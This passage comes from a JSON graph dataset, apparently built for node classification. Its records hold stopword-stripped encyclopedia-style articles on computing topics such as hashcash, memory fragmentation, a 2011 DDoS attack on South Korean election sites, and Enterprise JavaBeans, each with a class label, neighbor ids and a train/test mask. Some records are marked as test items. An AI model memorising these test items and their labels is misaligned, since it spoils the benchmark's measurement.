    "text": "Hashcash:hashcash hashcash proof-of-work system used limit email spam denial-of-service attacks recently become known use bitcoin cryptocurrencies part mining algorithm hashcash proposed 1997 adam back described formally back paper hashcash denial service counter-measure similar idea first proposed cynthia dwork moni naor eli ponyatovski 1992 paper pricing via processing combatting junk mail using weakened signature schemes rather simpler efficient hash-based approach introduced hashcash hashcash independent rediscovery proof work concept author aware dwork et al work hashcash cryptographic hash-based proof-of-work algorithm requires selectable amount work compute proof verified efficiently email uses textual encoding hashcash stamp added header email prove sender expended modest amount cpu time calculating stamp prior sending email words sender taken certain amount time generate stamp send email unlikely spammer receiver negligible computational cost verify stamp valid however known way find header necessary properties brute force trying random values answer found though testing individual string easy satisfactory answers rare enough require substantial number tries find answer hypothesis spammers whose business model relies ability send large numbers emails little cost per message cease profitable even small cost spam send receivers verify whether sender made investment use results help filter email header line looks something like header contains header contains recipient email address date message information proving required computation performed presence recipient email address requires different header computed recipient date allows recipient record headers received recently ensure header unique email message sender prepares header appends counter value initialized random number computes 160-bit sha-1 hash header first 20 bits i.e 5 significant hex digits hash zeros acceptable header sender increments counter tries hash 2 possible hash values 2 hash values satisfy criterion thus chance randomly selecting header 20 zeros beginning hash 1 2 approx 10 one million number times sender needs try get valid hash value modeled geometric distribution hence sender average try 2 values find valid header given reasonable estimates time needed compute hash would take one second find efficient method brute force approach known find valid header normal user desktop pc would significantly inconvenienced processing time required generate hashcash string however spammers would suffer significantly due large number spam messages sent technically system implemented following steps hash string passes tests considered valid hash string tests take far less time disk space receiving body content e-mail time needed compute hash collision exponential number zero bits zero bits added doubling amount time needed compute hash additional zero bit expensive spammers generate valid header lines confirming header valid always takes amount time matter many zero bits required valid header since requires single hashing operation hashcash system advantage micropayment proposals applying legitimate e-mail real money involved neither sender recipient need pay thus administrative issues involved micropayment system moral issues related charging e-mail entirely avoided hand hashcash requires potentially significant computational resources expended e-mail sent somewhat difficult tune ideal amount average time one wishes clients expend computing valid header mean sacrificing accessibility low-end embedded systems else running risk hostile hosts challenged enough provide effective filter spam hashcash also fairly simple implement mail user agents spam filters central server needed hashcash incrementally deployed—the extra hashcash header ignored received mail clients understand one plausible analysis concluded one following cases likely either non-spam e-mail get stuck due lack processing power sender spam e-mail bound still get examples include respectively centralized e-mail topology like mailing list server send enormous amount legitimate e-mails botnets cluster farms spammers increase processing power enormously issues may addressed e.g. botnets may expire faster users notice high cpu load take counter-measures mailing list servers registered white lists subscribers hosts thus relieved hashcash challenges represent serious obstacles hashcash deployment remain addressed another projected problem computers continue get faster according moore law difficulty calculations required must increased time however developing countries expected use older hardware means find increasingly difficult participate e-mail system also applies lower-income individuals developed countries afford latest hardware like hashcash cryptocurrencies use hash function proof-of-work system rise cryptocurrency created demand asic-based mining machines although cryptocurrencies use sha-256 hash function asic technology could used create hashcash solvers three orders magnitude faster consumer cpu reducing computational hurdle spammers contrast hashcash mail applications relies recipients set manually amount work intended deter malicious senders bitcoin cryptocurrency network employs different hashing-based proof-of-work challenge enable competitive bitcoin mining bitcoin miner runs computer program collects unconfirmed transactions coin dealers network data form block earn payment miner block accepted network miner discovers trial error nonce number included block yields hash sufficient number leading zero bits meet network difficulty target blocks accepted miners form bitcoin blockchain growing ledger every bitcoin transaction since coin first creation hashcash uses sha-1 hash requires first 20 160 hash bits zero bitcoin proof work uses two successive sha-256 hashes originally required least first 32 256 hash bits zero however bitcoin network periodically resets difficulty level keep average rate block creation 6 per hour january 2019 block 556678 bitcoin network responded deployments ever faster hashing hardware miners hardening requirement first 74 256 hash bits must zero hashcash used potential solution false positives automated spam filtering systems legitimate users rarely inconvenienced extra time takes mine stamp spamassassin able check hashcash stamps since version 2.70 assigning negative score i.e less likely spam valid unspent hashcash stamps however although hashcash plugin initially default still needs configured list address patterns must match hashcash resource field n't actually work default penny post software project sourceforge implements hashcash mozilla thunderbird email client project named historical availability conventional mailing services cost sender one penny see penny post information mailing services history microsoft also designed implemented deprecated open spec similar yet incompatible hashcash email postmark part coordinated spam reduction initiative csri microsoft email postmark variant hashcash implemented microsoft mail infrastructure components exchange outlook hotmail format differences hashcash microsoft email postmark postmark hashes body addition recipient uses modified sha-1 hash function uses multiple sub-puzzles reduce proof work variance like e-mail blogs often fall victim comment spam blog owners used hashcash scripts written javascript language slow comment spammers scripts wp-hashcash claim implement hashcash instead depend javascript obfuscation force client generate matching key require processing power use hashcash algorithm hashcash stamps hashcash patented reference implementation implementations free software hashcash included available many linux distributions rsa made ipr statements ietf client-puzzles context rfc described client-puzzles hashcash rfc included hashcash title referenced hashcash mechanism described known-solution interactive challenge akin client-puzzles hashcash non-interactive therefore known solution case rsa ipr statement apply hashcash hashcash predates march 1997 client-puzzles publication feb 1999 client-puzzles patent filing us7197639 february 2000",
    "neighbors": [
      9248,
      2273,
      3462,
      4294,
      2409,
      4883,
      2358,
      10263,
      4793,
      11418,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 3509,
    "label": 1,
    "text": "Object_Exchange_Model:object exchange model object exchange model oem model exchanging semi-structured data object-oriented databases serves basic data model numerous projects stanford university database group including tsimmis lore c3 slight variations oem evolved across different stanford projects lore labels actually parent-child links rather objects example oem object multiple parents different parent objects may use different labels identify object atomic value encoding person name might included one complex object using label author another complex object using label editor c3 additional attributes required object annotate changes object occurred time textual oem interchange format used lore goals interchange format textual encodings oem easy read easy edit easy generate parse program",
    "neighbors": [
      4055,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 3510,
    "label": 8,
    "text": "Peter_Zandan:peter zandan peter a. zandan born 1953 american entrepreneur field market research data science zandan currently global vice chairman hill+knowlton strategies leads company worldwide research operations founder intelliquest information group inc. austin-based global research firm served chairman ceo 1984 1998 taking company public 1996 intelliquest zandan pioneered use electronic surveys internet field market research 1999 zandan founded served ceo zilliant pricing optimization company zandan played active role austin texas community 2014 developed sponsored zandan poll annual survey among austin residents covers variety topics including economy affordability growth education policy issues overall cultural identity austin zandan currently member president circle national academies sciences engineering medicine zandan also serves board klru public television station austin texas member advisory council red mccombs school business ut austin moved austin 1970s zandan earned mba ph.d. evaluation research university texas austin born longmeadow massachusetts zandan received bachelor degree history university massachusetts 1975 latter half 1970s zandan moved mexico pursue international studies several years abroad returned united states earned mba ph.d. evaluation research 1983 university texas zandan founded first major company 1984 name intelliquest intelliquest focused changing way companies performed market research pioneering ‘ disk-by-mail ’ methodologies later utilizing internet based electronic surveys zandan served company chairman ceo 15 years intelliquest fastest growing market research company worldwide 1990s provided new product marketing branding services corporations apple ibm mckinsey co. microsoft hewlett-packard intelliquest provided marketing information technology companies direct marketing services internet marketers additionally supplied information tech markets subscription proprietary project basis zandan leadership intelliquest grew 500 employees offices austin silicon valley new york city london zandan took company public 1996 nasdaq exchange acquired wpp 1999 1998 company bought zandan stepped away day-to-day management operations company pursue interests 1998 peter zandan founded zilliant inc another austin-based corporation zilliant developed leader strategic pricing management providing software solutions enable corporations outline manage e-commerce pricing understood “ internet allows companies better understand customers preferences ” zandan helped develop flagship product called zilliant intelligent pricing solution zips tested real-time customer pricing behavior monitored activity market opportunities offering business-to-business predictive pricing sales applications zilliant grew quickly continues operate successfully peter zandan currently global vice chairman hill+knowlton strategies developed firm reputation management communications research offerings zandan provided assistance international brand development clients financial services energy technology healthcare retail industries specifically zandan leads research+data insights rdi corporation underneath umbrella organization hill+knowlton strategies zandan helped rdi yield data-based insights deliver metrics counsel brand health communication data analytics june 2013 zandan selected member president circle national academy science purpose president circle engage leaders various scientific disciplines engineering medicine effort ensure intellectual financial resources sustain/enhance research president circle honorary association membership acquired invitations presidents three academies along honored 1998 lifetime member mccombs business school advisory council starting zandan served board public television station klru since year also invested advised new media companies including wize inc. klout sold lithium technologies next big sound sold pandora peter zandan angel investing companies next big sound allowed continue remain active part startup company scene peter zandan impacted austin community social analytics work external involvement zandan poll annual report surveys austin-area residents assess attitudes community economy health transportation city longtime citizen austin zandan watched community grow years wanted create objective tool measure austinites felt community evolving zandan provides gift austin community help klru hill+knowlton strategies rdi cambia information group poll expanded areas “ cultural identity ” affordability order increase understanding dialogue key community issues zandan also received austin “ soul city ” business award contributions community co-chair austin 360 summit one-day issues conference austin high-tech executives additionally chairs austin city limits committee member board directors klru-tv growing intelliquest one fastest-growing market research firms 1990s peter zandan received ernst young entrepreneur year award 1993 high technology electronics award represents elite corp men women recognized exceptional entrepreneurial achievements due extensive work austin area peter zandan also awarded “ best visionary ” award austin chronicle weekly newspaper austin texas",
    "neighbors": [
      5384,
      3323,
      5461
    ],
    "mask": "Test"
  },
  {
    "node_id": 3511,
    "label": 3,
    "text": "Actions_Semiconductor:actions semiconductor actions semiconductor co. ltd. chinese fabless semiconductor company founded 2000 headquartered zhuhai guangdong province company 600 employees designs socs tablets digital audio players photo viewers related products following list system-on-chips developed marketed actions semiconductor mainly targeting tablets s1 mp3 players use chipsets designed actions 2012 actions semiconductor produced atm7029 quad-core arm cortex-a5-based soc using vivante corporations gc1000 gpu soc used ainol novo10 hero ii tablet low end tablets q2 2014 actions reported fourth largest supplier tablet processors chinese market one point actions sued sigmatel sigmatel prevailing findings actions infringed upon sigmatel directly copying asics designed sigmatel world leader mp3 asic market sigmatel later sold freescale semiconductor",
    "neighbors": [
      3585,
      11282,
      9235,
      11289,
      4124,
      1057,
      38,
      4139,
      3117,
      2097,
      8253,
      10303,
      7745,
      7234,
      7747,
      2635,
      99,
      8812,
      10361,
      9851,
      638,
      644,
      11396,
      8842,
      146,
      659,
      1682,
      7833,
      666,
      5786,
      4258,
      9913,
      8383,
      10945,
      4821,
      2788,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6925,
      2838,
      5417,
      2862,
      7988,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      11094,
      6495,
      1377,
      9581,
      11629,
      6001,
      373,
      6009,
      392,
      1428,
      410,
      4508,
      7077,
      9638,
      938,
      9155,
      9163,
      7631,
      6608,
      980,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 3512,
    "label": 6,
    "text": "Fragmentation_(computing):fragmentation computing computer storage fragmentation phenomenon storage space used inefficiently reducing capacity performance often exact consequences fragmentation depend specific system storage allocation use particular form fragmentation many cases fragmentation leads storage space wasted case term also refers wasted space systems e.g fat file system space used store given data e.g files regardless degree fragmentation none extreme three different related forms fragmentation external fragmentation internal fragmentation data fragmentation present isolation conjunction fragmentation often accepted return improvements speed simplicity analogous phenomena occur resources processors see computer program requests blocks memory computer system blocks allocated chunks computer program finished chunk free chunk back system making available later allocated another program size amount time chunk held program varies lifespan computer program request free many chunks memory program started free memory areas long contiguous time use long contiguous regions become fragmented smaller smaller contiguous areas eventually may become impossible program obtain large contiguous chunks memory due rules governing memory allocation computer memory sometimes allocated needed example memory provided programs chunks divisible 4 8 16 result program requests perhaps 29 bytes actually get chunk 32 bytes happens excess memory goes waste scenario unusable memory contained within allocated region arrangement termed fixed partitions suffers inefficient memory use process matter small occupies entire partition waste called internal fragmentation unlike types fragmentation internal fragmentation difficult reclaim usually best way remove design change example dynamic memory allocation memory pools drastically cut internal fragmentation spreading space overhead larger number objects external fragmentation arises free memory separated small blocks interspersed allocated memory weakness certain storage allocation algorithms fail order memory used programs efficiently result although free storage available effectively unusable divided pieces small individually satisfy demands application term external refers fact unusable storage outside allocated regions example consider situation wherein program allocates 3 continuous blocks memory frees middle block memory allocator use free block memory future allocations however use block memory allocated larger size free block external fragmentation also occurs file systems many files different sizes created change size deleted effect even worse file divided many small pieces deleted leaves similarly small regions free spaces data fragmentation occurs collection data memory broken many pieces close together typically result attempting insert large object storage already suffered external fragmentation example files file system usually managed units called blocks clusters file system created free space store file blocks together contiguously allows rapid sequential file reads writes however files added removed changed size free space becomes externally fragmented leaving small holes place new data new file written existing file extended operating system puts new data new non-contiguous data blocks fit available holes new data blocks necessarily scattered slowing access due seek time rotational latency read/write head incurring additional overhead manage additional locations called file system fragmentation writing new file known size empty holes larger file operating system avoid data fragmentation putting file one holes variety algorithms selecting potential holes put file heuristic approximate solution bin packing problem best fit algorithm chooses smallest hole big enough worst fit algorithm chooses largest hole first-fit algorithm chooses first hole big enough next fit algorithm keeps track file written next fit algorithm faster first fit turn faster best fit speed worst fit compaction eliminate external fragmentation data fragmentation eliminated rearranging data storage related pieces close together example primary job defragmentation tool rearrange blocks disk blocks file contiguous defragmenting utilities also attempt reduce eliminate free space fragmentation moving garbage collectors also move related objects close together called compacting improve cache performance four kinds systems never experience data fragmentation—they always store every file contiguously four kinds significant disadvantages compared systems allow least temporary data fragmentation compared external fragmentation overhead internal fragmentation account little loss terms wasted memory reduced performance defined formula_1 fragmentation 0 means free memory single large block fragmentation 90 example 100 mb free memory present largest free block memory storage 10 mb external fragmentation tends less problem file systems primary memory ram storage systems programs usually require ram storage requests fulfilled contiguous blocks file systems typically designed able use collection available blocks fragments assemble file logically appears contiguous therefore highly fragmented file many small files deleted full volume new file size equal newly freed space created new file simply reuse fragments freed deletion deleted one file new file fragmented old file case barrier using highly fragmented free space create new file ram hand storage systems used often assemble large block meet request small noncontiguous free blocks request fulfilled program proceed whatever needed memory unless reissue request number smaller separate requests severe problem caused fragmentation causing process system fail due premature resource exhaustion contiguous block must stored stored failure occurs fragmentation causes occur even enough resource contiguous amount example computer 4 gib memory 2 gib free memory fragmented alternating sequence 1 mib used 1 mib free request 1 contiguous gib memory satisfied even though 2 gib total free order avoid allocator may instead failing trigger defragmentation memory compaction cycle resource reclamation major garbage collection cycle hope able satisfy request allows process proceed severely impact performance fragmentation causes performance degradation number reasons basically fragmentation increases work required allocate access resource example hard drive tape drive sequential data reads fast seeking different address slow reading writing fragmented file requires numerous seeks thus much slower addition causing greater wear device resource fragmented allocation requests simply satisfied returning single block start free area however fragmented request requires either searching large enough free block may take long time fulfilling request several smaller blocks possible results allocation fragmented requiring additional overhead manage several pieces subtler problem fragmentation may prematurely exhaust cache causing thrashing due caches holding blocks individual data example suppose program working set 256 kib running computer 256 kib cache say l2 instruction+data cache entire working set fits cache thus executes quickly least terms cache hits suppose 64 translation lookaside buffer tlb entries 4 kib page memory access requires virtual-to-physical translation fast page cache tlb working set unfragmented fit onto exactly 64 pages page working set 64 pages memory lookups served cache however working set fragmented fit 64 pages execution slow due thrashing pages repeatedly added removed tlb operation thus cache sizing system design must include margin account fragmentation memory fragmentation one severe problems faced system managers time leads degradation system performance eventually memory fragmentation may lead complete loss application-usable free memory memory fragmentation kernel programming level problem real-time computing applications fragmentation levels reach high 99 may lead system crashes instabilities type system crash difficult avoid impossible anticipate critical rise levels memory fragmentation however may possible system continue running programs case excessive memory fragmentation well-designed system able recover critical fragmentation condition moving memory blocks used system order enable consolidation free memory fewer larger blocks worst case terminating programs free memory defragmenting resulting sum total free memory least avoid true crash sense system failure allow system continue running programs save program data etc also important note fragmentation phenomenon system software design different software susceptible fragmentation different degrees possible design system never forced shut kill processes result memory fragmentation fragmentation best known problem memory allocation analogous phenomena occur resources notably processors example system uses time-sharing preemptive multitasking check process blocked process executes part time slice blocks proceed remainder time slice wastes time resulting internal fragmentation time slices fundamentally time-sharing causes external fragmentation processes due running fragmented time slices rather single unbroken run resulting cost process switching increased cache pressure multiple processes using caches result degraded performance concurrent systems particularly distributed systems group processes must interact order progress processes scheduled separate times separate machines fragmented across time machines time spent waiting communicating severely degrade performance instead performant systems require coscheduling group flash file systems several different kinds internal fragmentation involving dead space dark space",
    "neighbors": [
      2304,
      1801,
      7818,
      4747,
      3725,
      5390,
      7053,
      5008,
      2194,
      9490,
      11539,
      11667,
      11033,
      541,
      3871,
      1954,
      9762,
      1190,
      814,
      819,
      5043,
      1592,
      3640,
      10040,
      4668,
      2625,
      1474,
      3267,
      8129,
      11075,
      1736,
      4424,
      6346,
      6730,
      6221,
      5840,
      5074,
      468,
      6868,
      86,
      4438,
      5080,
      7039,
      9300,
      9559,
      1247,
      6624,
      8545,
      868,
      2278,
      2152,
      5352,
      7403,
      634,
      8573,
      890,
      2687
    ],
    "mask": "None"
  },
  {
    "node_id": 3513,
    "label": 4,
    "text": "DDoS_attacks_during_the_October_2011_South_Korean_by-election:ddos attacks october 2011 south korean by-election ddos attacks october 2011 south korean by-election allegedly two separate distributed denial-of-service ddos attacks occurred october 26 2011 attacks took place october 2011 seoul mayoral by-election targeted websites national election commission nec then-mayoral candidate park won-soon investigators assert attacks carried hopes suppressing young voters benefit grand national party aide grand national party legislator choi gu-sik found responsible attacks attacks consisted two separate denial-of-service attacks independent national election commission mayoral candidate park won-soon carried help botnet 200 infected computers attacks conducted morning citizens -- particularly young voters looking vote work -- would expected look polling station locations theorized attacks conducted belief may reduce voter turnout benefit grand national party candidate na kyung-won police stated attack nec lasted two hours specifically impacting part website information polling locations park won-soon website attacked twice day national police agency later revealed aide grand national part lawmaker referred media surname gong responsible two attacks national police agency later arrested gong four associates researchers however questioned official narrative doubts raised whether gong technical expertise resources pull attack others pointed ddos attack would unusual parts website offline online suggesting perhaps technical failure instead events caused collective panic amongst gnp members often denounce online activities south korean progressives exposure role attacks led choi gu-sik officially resigning position lawmaker along several members gnp wake scandal reformists conservative grand national party put pressure core members party closely affiliated lee myung-bak government turn led park geun-hye brought back spotlight reorganize gnp 30 university student associations made joint statement calling thorough investigation attacks",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3514,
    "label": 3,
    "text": "IBM_ThinkPad_T20_series:ibm thinkpad t20 series ibm thinkpad t20 series series notebook computers introduced may 2000 ibm successor 600 series first model t-series exists today lenovo ownership four models produced t20 t21 t22 t23 series succeeded may 2002 thinkpad t30 produced july 2003 t20 series successor 600 series adding new features s-video output ethernet port ultrabay 2000 hot-swappable bay graphics card upgraded 4mb neomagic 256zx used 600x 8mb s3 savage 16mb t23 models capable rendering 3d graphics hardware thinkpad t23 also first thinkpad laptop model offer optional wifi connection via mini-pci card wireless antennas built lid select upper-end models t20 series originally shipped either windows 98 windows 2000 linux later t23 models shipping windows xp t20 models capable running windows 3.x windows 95 windows nt 4.0 os/2 warp 4 windows well various linux distributions additionally t23 capable running windows vista windows 7 least 512mb memory one common problem earlier t20 series hardware defect machine would suddenly stop working blink hard drive power indicators rendering machine unable power known blink death addition t23 models rear memory slot may fail rendering machine able use 512mb memory rather 1gb another common issue t23 one coils near cpu breaks motherboard due cold solder joints causing sorts weird issues like unable boot hard lockups/freezes thinkpad series",
    "neighbors": [
      1186,
      3304,
      3496,
      780,
      3250,
      2165,
      823,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 3515,
    "label": 9,
    "text": "OpenROAD:openroad openroad stands open rapid object application development software product actian corporation openroad fourth-generation programming language 4gl include suite development tools built-in integrated development environment ide written openroad code repository allowing applications developed deployed microsoft unix/linux platforms history openroad closely tied ingres relational database openroad started early 1990s product called windows 4gl ingres re-badged openingres new name openroad born since time number major developments ingres product set marketed ask corporation computer associates ingres corporation actian popular governments north west europe found many government departments openroad née windows4gl appeared beta form sun platform 1991 windows4gl 1.0 available british universities special license agreement development environment known sapphire editor sapphire editor allowed creation complex gui interfaces using ide rather large volumes motif code resource files one first environments enable rapid prototyping gui clients windows4gl 2.0 introduced microsoft windows compatibility debugger openroad 3.0 became stable ms windows openroad 3.5 1 became stable openroad 4.1 introduced interface activex controls providing access activex control attributes methods within language mechanism often requires 'wrapper dlls written handle data type issues one 2000 character limit strings text interpreted language uses runtime distributable client process 'image files thus dll .net dependency issues ms windows activex aside possible use images environment unix vms ms windows version 3.51 however portability issues gui environments mostly related font differences made difficult macintosh beta version produced 3.51 unix environments used commercial pc emulator give native capability possibly one hurdles road open source status across platforms variations distribution include fat client requires ingres net communication thin eclient used without ingres net needs use application server instead dcom finally mclient mobile windows clients http services required interface application server openroad 2006 5.0+ went general available december 2006 openroad 5.1 went generally available apr 2011 defining feature release general-purpose system classes xml support allow creation parsing arbitrary xml documents without need create additional user classes use external components 3gl procedures external class libraries providing xml based export file format documented human readable produce clean differences different revisions file allow changes merged allow openroad source components managed many different software configuration management scm systems openroad 2006 5.5 unicode support special limited release openroad 6.0 current general release includes additional unicode support 5.5 syntax openroad closely linked ingres database direct support embedded sql similar way event based programming languages code placed groups related windows/system events syntax similar microsoft visual basic allowing openroad users quickly adapt visual basic help intellisense intellisense still available q2 2008 openroad ide however editors like textpad syntax files allow colour-coding source files using key word recognition openroad comes system classes following functionality openroad application deployed following clients thin client web windows various flavours linux/unix support n-tier systems using openroad application server application server deployed windows linux/unix platforms built-in support ingres database one following using product called enterprise access oracle sql server db2 allows client use sql syntax target databases product links community links mailing lists webcasts",
    "neighbors": [
      4042,
      6780,
      10413,
      9286
    ],
    "mask": "None"
  },
  {
    "node_id": 3516,
    "label": 4,
    "text": "Compartmentalization_(information_security):compartmentalization information security compartmentalization information security whether public private limiting access information persons entities need-to-know basis perform certain tasks originated handling classified information military intelligence applications dates back antiquity successfully used keep secret greek fire basis compartmentalization idea fewer people know details mission task risk likelihood information compromised fall hands opposition decreased hence varying levels clearance within organizations exist yet even someone highest clearance certain compartmentalized information identified codewords referring particular types secret information may still restricted certain operators even lower overall security clearance information marked way said codeword–classified one famous example ultra secret documents marked top secret ultra top secret marked security level ultra keyword restricted readership cleared read ultra documents compartmentalization also used commercial security engineering technique protect information medical records example compartmentalization manhattan project personnel oak ridge constructed operated centrifuges isolate uranium-235 naturally occurring uranium know exactly knew know parts weapon separately designed teams know parts interacted",
    "neighbors": [
      10835,
      2779,
      5373,
      6902
    ],
    "mask": "Test"
  },
  {
    "node_id": 3517,
    "label": 9,
    "text": "Enterprise_JavaBeans:enterprise javabeans enterprise javabeans ejb one several java apis modular construction enterprise software ejb server-side software component encapsulates business logic application ejb web container provides runtime environment web related software components including computer security java servlet lifecycle management transaction processing web services ejb specification subset java ee specification ejb specification originally developed 1997 ibm later adopted sun microsystems ejb 1.0 1.1 1999 enhanced java community process jsr 19 ejb 2.0 jsr 153 ejb 2.1 jsr 220 ejb 3.0 jsr 318 ejb 3.1 jsr 345 ejb 3.2 ejb specification provides standard way implement server-side also called back-end 'business software typically found enterprise applications opposed 'front-end user interface software software addresses types problem solutions problems often repeatedly re-implemented programmers enterprise javabeans intended handle common concerns persistence transactional integrity security standard way leaving programmers free concentrate particular parts enterprise software hand ejb specification details application server provides following responsibilities additionally enterprise javabean specification defines roles played ejb container ejbs well deploy ejbs container note current ejb 3.2 specification detail application server provides persistence task delegated jpa specification instead details business logic easily integrate persistence services offered application server businesses found using ejbs encapsulate business logic brought performance penalty original specification allowed remote method invocation corba optionally protocols even though large majority business applications actually require distributed computing functionality ejb 2.0 specification addressed concern adding concept local interfaces could called directly without performance penalties applications distributed multiple servers ejb 3.0 specification jsr 220 departure predecessors following new light-weight paradigm ejb 3.0 shows influence spring use plain java objects support dependency injection simplify configuration integration heterogeneous systems gavin king creator hibernate participated ejb 3.0 process outspoken advocate technology many features originally hibernate incorporated java persistence api replacement entity beans ejb 3.0 ejb 3.0 specification relies heavily use annotations feature added java language 5.0 release convention configuration enable much less verbose coding style accordingly practical terms ejb 3.0 much lightweight nearly completely new api bearing little resemblance previous ejb specifications following shows basic example ejb looks like code defines service class persisting customer object via o/r mapping ejb takes care managing persistence context addcustomer method transactional thread-safe default demonstrated ejb focuses business logic persistence knows nothing particular presentation ejb used class e.g web layer follows defines javaserver faces jsf backing bean ejb injected means ejb annotation addcustomer method typically bound ui component button contrary ejb backing bean contain business logic persistence code delegates concerns ejb backing bean know particular presentation ejb knowledge ejb container holds two major types beans stateful session beans business objects state keep track calling client dealing throughout session thus access bean instance strictly limited one client time concurrent access single bean attempted anyway container serializes requests via accesstimeout annotation container instead throw exception stateful session beans state may persisted passivated automatically container free memory client n't accessed bean time jpa extended persistence context explicitly supported stateful session beans stateless session beans business objects state associated however access single bean instance still limited one client time concurrent access bean prohibited concurrent access single bean attempted container simply routes request different instance makes stateless session bean automatically thread-safe instance variables used single method call client bean contents instance variables guaranteed preserved across different client method calls instances stateless session beans typically pooled second client accesses specific bean right method call made first client finished might get instance lack overhead maintain conversation calling client makes less resource-intensive stateful beans singleton session beans business objects global shared state within jvm concurrent access one bean instance controlled container container-managed concurrency cmc bean bean-managed concurrency bmc cmc tuned using lock annotation designates whether read lock write lock used method call additionally singleton session beans explicitly request instantiated ejb container starts using startup annotation message driven beans business objects whose execution triggered messages instead method calls message driven bean used among others provide high level ease-of-use abstraction lower level jms java message service specification may subscribe jms message queues message topics typically happens via activationconfig attribute messagedriven annotation added ejb allow event-driven processing unlike session beans mdb client view local/remote/no-interface i. e. clients look-up mdb instance mdb listens incoming message example jms queue topic processes automatically jms support required java ee spec message driven beans support messaging protocols protocols may asynchronous also synchronous since session beans also synchronous asynchronous prime difference session- message driven beans synchronicity difference object oriented method calling messaging ejbs deployed ejb container typically within application server specification describes ejb interacts container client code interacts container/ejb combination ejb classes used applications included package package service provider interface used ejb container implementations clients ejbs instantiate beans directly via java new operator instead obtain reference via ejb container reference usually reference implementation bean proxy either dynamically implements local remote business interface client requested dynamically implements sub-type actual bean proxy directly cast interface bean client said 'view ejb local interface remote interface bean type respectively correspond local view remote view no-interface view proxy needed order give ejb container opportunity transparently provide cross-cutting aop-like services bean like transactions security interceptions injections remoting example client invokes method proxy first start transaction help ejb container call actual bean method bean method returns proxy ends transaction i.e committing rollback transfers control back client ejb container responsible ensuring client code sufficient access rights ejb security aspects declaratively applied ejb via annotations ejb containers must support container managed acid transactions bean managed transactions container-managed transactions cmt default active calls session beans explicit configuration needed behavior may declaratively tuned bean via annotations needed configuration later overridden deployment descriptor tuning includes switching transactions whole bean specific methods requesting alternative strategies transaction propagation starting joining transaction strategies mainly deal happen transaction n't already progress time bean called following variations supported alternatively bean also declare via annotation wants handle transactions programmatically via jta api mode operation called bean managed transactions bmt since bean handles transaction instead container jms java message service used send messages beans clients let clients receive asynchronous messages beans mdbs used receive messages clients asynchronously using either jms queue topic alternative injection clients ejb obtain reference session bean proxy object ejb stub using java naming directory interface jndi alternative used cases injection available non-managed code standalone remote java se clients necessary programmatically determine bean obtain jndi names ejb session beans assigned ejb container via following scheme entries square brackets denote optional parts single bean obtained name matching patterns depending 'location client clients module required bean use module scope larger scopes clients application required bean use app scope higher etc e.g code running module customerservice bean given example shown earlier article could use following code obtain local reference communication client written java programming language session bean expose remote-view via remote annotated interface allows beans called clients jvms may located remote systems point view ejb container code another jvm remote stateless- singleton session beans may also expose web service client view remote communication via wsdl soap plain xml follows jax-rpc jax-ws specifications jax-rpc support however proposed future removal support jax-ws session bean annotated webservice annotation methods exposed remotely webmethod annotation.. although ejb specification mention exposure restful web services way explicit support form communication jax-rs specification explicitly support ejb following jax-rs spec stateless- singleton session beans root resources via path annotation ejb business methods mapped resource methods via get put post delete annotations however count web service client view used exclusively jax-ws jax-rpc communication via web services typical clients written java programming language also convenient java clients trouble reaching ejb server via firewall additionally web service based communication used java clients circumvent arcane ill-defined requirements so-called client-libraries set jar files java client must class-path order communicate remote ejb server client-libraries potentially conflict libraries client may already instance client also full java ee server conflict deemed hard impossible resolve ejb 2.1 earlier ejb provide java implementation class two java interfaces ejb container created instances java implementation class provide ejb implementation java interfaces used client code ejb ejb 2.1 earlier ejb specification required deployment descriptor present needed implement mechanism allowed ejbs deployed consistent manner regardless specific ejb platform chosen information bean deployed name home remote interfaces whether store bean database etc specified deployment descriptor deployment descriptor xml document entry ejb deployed xml document specifies following information ejb old ejb containers many vendors required deployment information ejb specification would require additional information separate xml files configuration file format ejb platform vendor generally provided tools would read deployment descriptor possibly generated set classes would implement deprecated home remote interfaces since ejb 3.0 jsr 220 xml descriptor replaced java annotations set enterprise bean implementation source level although still possible use xml descriptor instead addition annotations xml descriptor annotations applied attribute within enterprise bean xml definition overrides corresponding source-level annotation although xml elements also additive e.g. activation-config-property xml different name already defined via activationconfigproperty annotation added instead replacing existing properties starting ejb 3.1 ejb specification defines two variants ejb container full version limited version limited version adheres proper subset specification called ejb 3.1 lite part java ee 6 web profile subset full java ee 6 specification ejb 3.1 lite excludes support following features ejb 3.2 lite excludes less features particularly longer excludes asynchronous schedule/ timeout schedule support persistent attribute full ejb 3.2 support complete excluded list ejb 3.2 lite ejb 3.2 final release 2013-05-28 jsr 345 enterprise javabeans 3.2 relatively minor release mainly contained specification clarifications lifted restrictions imposed spec time appeared serve real purpose existing full ejb features also demanded ejb 3 lite functionality proposed pruned ejb 3.1 indeed pruned made optional following features added ejb 3.1 final release 2009-12-10 jsr 318 purpose enterprise javabeans 3.1 specification simplify ejb architecture reducing complexity developer point view also adding new functionality response needs community ejb 3.0 final release 2006-05-11 jsr 220 major changes release made much easier write ejbs using 'annotations rather complex 'deployment descriptors used version 2.x use home remote interfaces ejb-jar.xml file also longer required release replaced business interface bean implements interface ejb 2.1 final release 2003-11-24 jsr 153 major changes ejb 2.0 final release 2001-08-22 jsr 19 major changes overall goals ejb 1.1 final release 1999-12-17 major changes goals release 1.1 ejb 1.0 1998-03-24 announced javaone 1998 sun third java developers conference march 24 27 goals release 1.0",
    "neighbors": [
      9988,
      8965,
      3080,
      4233,
      9224,
      3341,
      7446,
      5658,
      7067,
      7965,
      10526,
      2596,
      5029,
      10020,
      5677,
      6067,
      2106,
      3517,
      3518,
      3519,
      3008,
      6334,
      9665,
      4419,
      10048,
      11582,
      1095,
      6860,
      3278,
      3920,
      4688,
      1363,
      2009,
      219,
      479,
      4959,
      4960,
      9441,
      3558,
      1128,
      489,
      3560,
      3710,
      9834,
      9962,
      3954,
      2804,
      10486,
      9467,
      2556,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3518,
    "label": 9,
